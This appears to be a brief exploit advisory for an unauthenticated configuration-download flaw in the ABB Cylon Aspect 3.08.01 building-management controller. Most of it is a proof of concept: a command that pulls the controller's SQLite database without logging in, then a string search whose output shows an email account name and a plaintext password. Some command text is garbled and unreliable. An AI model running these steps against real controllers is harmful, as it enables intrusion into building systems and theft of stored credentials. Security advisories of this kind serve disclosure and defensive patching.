thricer http://192.168.73.31/mapConfigurationDownload.php -o juice.db  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                 Dload  Upload   Total   Spent    Left  Speed100 3021k  100 3021k    0     0   112k      0  0:00:26  0:00:26 --:--:--  136k$ strings.exe juice.db | findstr /spina:d "tlsVersions"1878:dcom.aamatrix.topology.services.notification.EmailNotificationServer{"host":"smtp.gmail.com","smtpLocalhost":"google.com","starttls":1,"tlsVersions":"","from":"zsl_alarms@gmail.com","username":"zsl_alarms@gmail.com","password":"t00tw00t","port":587,"logDebugInfo":false,"authMode":0,"enabled":1,"serviceName":"EmailNotificationServer","debugLevel":0,"friendlyName":"Email Notification Service","description":""}

ABB Cylon Aspect 3.08.01 mapConfigurationDownload.php Configuration Download

The ABB BMS/BAS controller suffers from an unauthenticated configuration download vulnerability. This can be exploited to download the SQLite DB that contains the configuration mappings information via the FTControlServlet by directly calling the mapConfigurationDownload.php script.

Tag

#sql